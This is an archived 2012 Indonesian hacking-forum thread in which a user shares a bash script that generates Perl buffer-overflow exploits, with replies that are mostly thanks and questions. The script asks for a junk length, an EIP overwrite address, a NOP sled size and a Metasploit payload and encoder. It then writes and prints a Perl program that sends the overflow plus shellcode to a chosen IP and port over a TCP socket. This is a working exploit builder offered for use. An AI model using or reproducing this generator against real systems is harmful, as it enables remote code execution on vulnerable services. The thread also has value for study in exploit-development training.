+- Indonesian Back|Track Team (https://www.indonesianbacktrack.or.id/forum)
+-- Forum: General Zone (https://www.indonesianbacktrack.or.id/forum/forum-172.html)
+--- Forum: Programming (https://www.indonesianbacktrack.or.id/forum/forum-95.html)
+---- Forum: Bash (sh) (https://www.indonesianbacktrack.or.id/forum/forum-96.html)
+---- Thread: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl (/thread-3295.html)
Pages:
1
2
[Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - h3ll0s - 07-24-2012
Program ini digunakan untuk otomatis exploit suatu program dengan sending via socket. Namun sebelum menentukan exploitnya harus mngetahui register EIP yg akan di overwrite untuk menentukan SEH Handler
Code:
#! /bin/bash
echo "Generate Automatic Exploit And Sending Bad Char Via Socket Perl"
echo "USAGE: ./createplexploit.sh [file]"
echo " "
echo "Header yang diinginkan?"
read header
echo "Berapa ukuran Bad Char?"
read junksize
echo "Register EIP yang akan di overwrite?"
read eip
echo "Berapa NOP yang akan dikirim?"
read nop
echo "Payload yang digunakan?"
read payload
echo "Encoder yang digunakan?"
read encoder
echo "Pilihan untuk mengunakan payload (anda harus tahu ini)"
read ploptions
echo "IP anda? (Say \$ARGV[0] to make it ask)"
read ip
echo "Port yang digunakan untuk megirim exploit? (Say \$ARGV[1] to make it ask)"
read port
echo "###################"
echo "# Sending Exploit #"
echo "# Good Luck #"
echo "# h3ll0s #"
echo "###################"
sleep 10
#Proses Perl Sending Exploit Via Socket
echo '#! /usr/bin/perl' > $1
echo 'use IO::Socket;' >> $1
echo "\$header = \"$header\";" >> $1
echo "\$junk = \"\\x41\" x $junksize;" >> $1
echo "\$eip = pack('V', $eip);" >> $1
echo "\$nop = \"\\x90\" x $nop;" >> $1
shellcode=`msfpayload $payload $ploptions EXITFUNC=seh R | msfencode -t perl -e $encoder | grep -e '"'`
echo "\$shellcode = $shellcode" >> $1
echo '$socket = IO::Socket::INET->new(' >> $1
echo 'Proto => "tcp",' >> $1
echo "PeerAddr => \"$ip\"," >> $1
echo "PeerPort => \"$port\"," >> $1
echo ');' >> $1
echo '$socket->recv($serverdata, 1024);' >> $1
echo 'print $serverdata;' >> $1
echo '$socket->send($header.$junk.$eip.$nop.$shellcode);' >> $1
echo "Selesai"
cat $1
chmod +x $1
echo "http://twitter.com/h3ll0s_c0de"Referensi :
Vulnserver And Ollydbg
OllyDbg Tricks for Exploit Development
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - bee_os - 07-24-2012
aduh,kagak ngarti bang..
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - h3ll0s - 07-24-2012
(07-24-2012, 03:47 AM)bee_os Wrote: aduh,kagak ngarti bang..
sebenarnya tanpa bash pun bisa om, hnya Perl yg digunakan.
susah yaa, memang script ini harus belajar dulu apa itu exploit?
bgaimana jalannya suatu program? apa itu bad char?
selanjutnya silahkan belajar sendiri tentang assembly dan RE
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - Junior Riau - 07-24-2012
ollydbg buat oracle bukan yak?
btw nice share om hellos ^_^
apa kabar lama g kelihatan
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - Al - Ayyubi - 07-24-2012
seperti kata om juni : ollydbg buat oracle bukan om?
mirip om
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - Junior Riau - 07-24-2012
mirip apanya??ane kurang mudeng ni
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - rachmatasyary - 07-24-2012
bro gmna caranya.....
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - xsan-lahci - 07-24-2012
Teknik di reverse enginering ini
harus belajar dr dasar dl aku thanks for share bro
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - iKONspirasi - 07-24-2012
wew ada yg bisa assembly
ungkem+1 dari ane udah share disini
RE: [Share] Generate Automatic Exploit And Sending Bad Char Via Socket Perl - h3ll0s - 07-26-2012
Learning debuging, executable form, fuzzing vulnerability, stack register, SEH, shell code. and many more. It's not an easy stuff as it looks for exploit development.
bdw, terima kasih eaa +1 dari admin
@vaisal : kangen ane ya bang #sepik
apa ada yg bisa bantu menyelesaikan exploit saya yg tertunda lantaran linux mngalami crash :badpc:
selengkapnya